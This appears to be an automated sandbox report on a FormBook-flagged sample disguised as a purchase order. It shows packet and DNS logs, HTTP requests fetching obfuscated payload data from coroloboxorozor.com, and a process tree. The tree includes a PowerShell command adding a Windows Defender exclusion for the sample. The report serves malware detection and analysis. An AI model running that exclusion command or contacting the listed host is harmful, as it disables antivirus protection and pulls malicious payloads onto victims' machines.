                  Feb 23, 2021 09:36:42.415441036 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.416832924 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.416862965 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.417001963 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.418287039 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.418315887 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.418533087 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.419714928 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.419743061 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.419855118 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.421175003 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.421195030 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.421413898 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.422626019 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.422643900 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.422727108 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.469978094 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.469999075 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.470227957 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.470690012 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.470709085 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.470968008 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.472170115 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.472188950 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.472464085 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.473584890 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.473611116 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.473675966 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.475032091 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.475790977 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.475810051 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.475897074 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.477252007 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.477269888 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.477327108 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.478729963 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.478748083 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.479207993 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.480191946 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.480211973 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.481112003 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.481628895 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.481650114 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.482146025 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.483097076 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.483114958 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.483144999 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.484570980 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.484589100 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.484688997 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.485992908 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.486015081 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.486053944 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.487451077 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.487468958 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.487552881 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.488914967 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.488933086 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.489018917 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.490354061 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.490370989 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.490664005 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.491861105 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.491935968 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.492515087 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.492533922 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.492616892 CET4971180192.168.2.3104.21.71.230

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 23, 2021 09:36:29.477684975 CET5020053192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:29.526206017 CET53502008.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:30.567639112 CET5128153192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:30.619275093 CET53512818.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:31.423886061 CET4919953192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:31.475533009 CET53491998.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:32.631093025 CET5062053192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:32.679902077 CET53506208.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:32.810554981 CET6493853192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:32.871623993 CET53649388.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:33.611898899 CET6015253192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:33.663518906 CET53601528.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:35.327723026 CET5754453192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:35.376430035 CET53575448.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:36.516144991 CET5598453192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:36.567567110 CET53559848.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:37.545838118 CET6418553192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:37.594484091 CET53641858.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:38.684596062 CET6511053192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:38.736162901 CET53651108.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:39.915385008 CET5836153192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:39.966666937 CET53583618.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:41.291832924 CET6349253192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:41.340564966 CET53634928.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:42.053989887 CET6083153192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:42.114923954 CET53608318.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:42.416610956 CET6010053192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:42.465236902 CET53601008.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:43.602516890 CET5319553192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:43.651341915 CET53531958.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:44.509572029 CET5014153192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:44.558358908 CET53501418.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:45.782949924 CET5302353192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:45.831640959 CET53530238.8.8.8192.168.2.3
                  Feb 23, 2021 09:36:46.918080091 CET4956353192.168.2.38.8.8.8
                  Feb 23, 2021 09:36:46.969590902 CET53495638.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:04.148425102 CET5135253192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:04.211803913 CET53513528.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:05.951571941 CET5934953192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:06.000078917 CET53593498.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:07.372246981 CET5708453192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:07.429152012 CET53570848.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:10.121721029 CET5882353192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:10.170547009 CET53588238.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:17.713345051 CET5756853192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:17.762062073 CET53575688.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:25.645638943 CET5054053192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:25.694250107 CET53505408.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:44.435908079 CET5436653192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:44.493586063 CET53543668.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:53.301414967 CET5303453192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:53.350627899 CET53530348.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:54.271205902 CET5776253192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:54.322837114 CET53577628.8.8.8192.168.2.3
                  Feb 23, 2021 09:37:59.773099899 CET5543553192.168.2.38.8.8.8
                  Feb 23, 2021 09:37:59.832971096 CET53554358.8.8.8192.168.2.3
                  Feb 23, 2021 09:38:29.780184984 CET5071353192.168.2.38.8.8.8
                  Feb 23, 2021 09:38:29.831881046 CET53507138.8.8.8192.168.2.3
                  Feb 23, 2021 09:38:32.852880001 CET5613253192.168.2.38.8.8.8
                  Feb 23, 2021 09:38:32.912916899 CET53561328.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Feb 23, 2021 09:36:42.053989887 CET192.168.2.38.8.8.80xa5c2Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Feb 23, 2021 09:36:42.114923954 CET8.8.8.8192.168.2.30xa5c2No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                  Feb 23, 2021 09:36:42.114923954 CET8.8.8.8192.168.2.30xa5c2No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • coroloboxorozor.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349711104.21.71.23080C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  TimestampkBytes transferredDirectionData
                  Feb 23, 2021 09:36:42.200351954 CET1298OUTGET /base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html HTTP/1.1
                  Host: coroloboxorozor.com
                  Connection: Keep-Alive
                  Feb 23, 2021 09:36:42.408135891 CET1301INHTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 08:36:42 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: __cfduid=d3a4c8ac3a1b0db931a12a2c20754fb861614069402; expires=Thu, 25-Mar-21 08:36:42 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                  Last-Modified: Tue, 23 Feb 2021 03:54:31 GMT
                  Vary: Accept-Encoding
                  X-Frame-Options: SAMEORIGIN
                  CF-Cache-Status: DYNAMIC
                  cf-request-id: 086fa1a27d00000b3311053000000001
                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jVWNzufHJ99cmcidvUdRbHWrvgXaEbsypuAxkFtuyOZKg9wGVQU4YEGodATHy1zDzg4ID6Hua2NL75Q6uNlIzOOVsFWaB7CjL71h3H%2BpuoMmllOv"}],"max_age":604800}
                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                  Server: cloudflare
                  CF-RAY: 625f9ee3ffb70b33-AMS
                  Data Raw: 37 63 39 39 0d 0a 3c 70 3e 47 47 65 72 75 65 63 6c 6c 65 75 65 50 65 75 65 75 65 75 65 6c 65 75 65 75 65 75 65 69 4d 4d 65 69 4d 4d 65 75 65 75 65 63 49 6c 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 4c 6c 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 63 69 49 65 75 65 75 65 75 65 63 6c 65 50 63 65 63 49 4c 65 63 6c 65 75 65 63 49 75 65 72 65 69 75 4d 65 50 50 65 63 49 6c 65 63 65 47 4c 65 69 75 4d 65 50 50 65 49 6c 65 63 75 6c 65 63 75 4d 65 63 63 4d 65 50 69 65 63 63 69 65 63 63 6c 65 63 63 63 65 63 75 50 65 63 63 6c 65 72 47 65 63 75 72 65 50 69 65 72 72 65 72 47 65 63 63 75 65 63 63 75 65 63 63 63 65 63 63 4c 65 50 69 65 72 49 65 63 75 63 65 50 69 65 63 63 6c 65 63 63 47 65 63 63 75 65 50 69 65 63 75 4d 65 63 63 75 65 50 69 65 4c 49 65 47 72 65 49 50 65 50 69 65 63 75 72 65 63 63 63 65 63 75 75 65 63 75 63 65 6c 4c 65 63 50 65 63 50 65 63 75 65 50 4c 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 49 75 65 4c 72 65 75 65 75 65 47 4c 65 63 65 50 65 75 65 47 4c 65 63 6c 69 65 6c 63 65 63 49 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 69 69 6c 65 75 65 50 6c 65 75 65 63 63 65 63 65 49 75 65 75 65 75 65 63 4c 4c 65 72 65 75 65 75 65 4c 65 75 65 75 65 75 65 75 65 75 65 75 65 69 50 49 65 63 72 47 65 72 65 75 65 75 65 50 69 65 75 65 75 65 75 65 69 69 6c 65 72 65 75 65 75 65 75 65 75 65 63 69 49 65 75 65 50 69 65 75 65 75 65 75 65 69 65 75 65 75 65 6c 65 75 65 75 65 75 65 75 65 75 65 75 65 75 65 6c 65 75 65 75 65 75 65 75 65 75 65 75 65
                  Data Ascii: 7c99<p>GGerueclleuePeueueueleueueueiMMeiMMeueuecIleueueueueueueueLleueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueciIeueueueclePcecILecleuecIuereiuMePPecIleceGLeiuMePPeIleculecuMeccMePiecciecclecccecuPecclerGecurePierrerGeccueccueccceccLePierIecucePieccleccGeccuePiecuMeccuePieLIeGreIPePiecurecccecuuecucelLecPecPecuePLeueueueueueueueIueLreueueGLecePeueGLeclielcecIueueueueueueueueueiileuePleuecceceIueueuecLLereueueLeueueueueueueiPIecrGereueuePieueueueiilereueueueueciIeuePieueueueieueueleueueueueueueueleueueueueueue
                  Feb 23, 2021 09:36:43.711971998 CET2376OUTGET /base/C02C82A7124B198823DC14A0727ADA5A.html HTTP/1.1
                  Host: coroloboxorozor.com
                  Feb 23, 2021 09:36:43.877722025 CET2377INHTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 08:36:43 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: __cfduid=ded8d61f3eec628b094e1c0e3966a84701614069403; expires=Thu, 25-Mar-21 08:36:43 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                  Last-Modified: Tue, 23 Feb 2021 03:54:37 GMT
                  Vary: Accept-Encoding
                  X-Frame-Options: SAMEORIGIN
                  CF-Cache-Status: DYNAMIC
                  cf-request-id: 086fa1a86600000b33e9b57000000001
                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qKDvTIzo9BXuxDd9D5JkYhc4B5tIRkHu3f8kN4P2VTOnLxBlP77yt7BXIMXnLnWZEGt9Jo7Vy0FMaRVaI5ZXgN%2F6ncvgzWYn1v4ZWFaWLoo2t7HX"}],"max_age":604800}
                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                  Server: cloudflare
                  CF-RAY: 625f9eed7efc0b33-AMS
                  Data Raw: 37 63 39 39 0d 0a 3c 70 3e 63 4c 63 65 69 50 6c 65 69 4d 63 65 63 4c 4c 65 63 69 72 65 63 4d 47 65 50 49 65 63 4d 72 65 63 75 50 65 69 50 63 65 69 4c 65 4c 4d 65 72 47 65 47 49 65 6c 4c 65 69 6c 69 65 72 47 65 69 69 47 65 69 50 63 65 72 6c 65 4c 50 65 6c 6c 65 72 4c 65 63 49 63 65 63 47 72 65 47 50 65 63 75 65 47 69 65 6c 65 63 47 65 47 72 65 72 4d 65 69 50 63 65 49 63 65 63 75 47 65 69 75 47 65 49 49 65 69 63 65 69 63 72 65 63 49 65 47 63 65 4c 6c 65 69 69 50 65 63 49 69 65 63 4d 69 65 63 4c 63 65 63 49 50 65 63 4c 4c 65 63 49 72 65 63 6c 75 65 63 75 63 65 69 50 75 65 63 72 47 65 63 4c 4d 65 63 69 47 65 4d 47 65 4c 6c 65 63 50 49 65 69 6c 6c 65 63 4d 6c 65 69 75 4d 65 47 63 65 50 69 65 69 4d 65 63 72 49 65 63 50 69 65 50 4d 65 63 4c 72 65 72 4c 65 63 4d 65 63 4d 72 65 6c 4d 65 72 4c 65 69 6c 72 65 4d 72 65 69 47 65 4c 72 65 4d 63 65 69 75 72 65 4d 4c 65 63 6c 4c 65 63 4c 47 65 4d 4c 65 69 6c 72 65 63 50 6c 65 63 4d 75 65 72 69 65 63 49 69 65 47 47 65 4d 72 65 69 4d 75 65 69 50 49 65 63 69 47 65 63 6c 65 69 6c 50 65 72 63 65 72 6c 65 6c 4c 65 63 47 49 65 72 47 65 4d 50 65 47 4c 65 63 72 50 65 69 50 65 4c 4d 65 63 47 4d 65 4d 6c 65 69 4d 69 65 63 47 6c 65 63 50 4d 65 63 4c 69 65 63 49 69 65 72 4d 65 50 4d 65 63 75 6c 65 50 4d 65 69 50 63 65 47 4c 65 69 6c 6c 65 69 75 69 65 63 75 65 6c 47 65 69 63 4d 65 63 50 6c 65 4c 65 69 69 75 65 63 6c 47 65 63 63 49 65 63 49 72 65 63 50 6c 65 63 50 4c 65 47 49 65 69 6c 72 65 63 50 4c 65 49 72 65 50 49 65 69 69 4d 65 6c 50 65 69 69 63 65 69 69 4c 65 63 72 4c 65 69 63 47 65 63 75 72 65 6c 4d 65 63 4c 63 65 72 6c 65 63 75 50 65 63 75 50 65 4d 47 65 63 6c 65 47 49 65 69 69
                  Data Ascii: 7c99<p>cLceiPleiMcecLLecirecMGePIecMrecuPeiPceiLeLMerGeGIelLeilierGeiiGeiPcerleLPellerLecIcecGreGPecueGielecGeGrerMeiPceIcecuGeiuGeIIeiceicrecIeGceLleiiPecIiecMiecLcecIPecLLecIrecluecuceiPuecrGecLMeciGeMGeLlecPIeillecMleiuMeGcePieiMecrIecPiePMecLrerLecMecMrelMerLeilreMreiGeLreMceiureMLeclLecLGeMLeilrecPlecMueriecIieGGeMreiMueiPIeciGecleilPercerlelLecGIerGeMPeGLecrPeiPeLMecGMeMleiMiecGlecPMecLiecIierMePMeculePMeiPceGLeilleiuiecuelGeicMecPleLeiiueclGeccIecIrecPlecPLeGIeilrecPLeIrePIeiiMelPeiiceiiLecrLeicGecurelMecLcerlecuPecuPeMGecleGIeii


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:09:36:38
                  Start date:23/02/2021
                  Path:C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe'
                  Imagebase:0xb50000
                  File size:639488 bytes
                  MD5 hash:9D8635210670E8B332120A969DFA269E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:09:36:53
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
                  Imagebase:0xa70000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:09:36:53
                  Start date:23/02/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6b2800000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:36:55
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                  Imagebase:0xbd0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:36:56
                  Start date:23/02/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6b2800000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:36:56
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\timeout.exe
                  Wow64 process (32bit):true
                  Commandline:timeout 1
                  Imagebase:0x12f0000
                  File size:26112 bytes
                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:37:03
                  Start date:23/02/2021
                  Path:C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  Imagebase:0xce0000
                  File size:639488 bytes
                  MD5 hash:9D8635210670E8B332120A969DFA269E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:09:37:05
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964
                  Imagebase:0x7ff6b2800000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >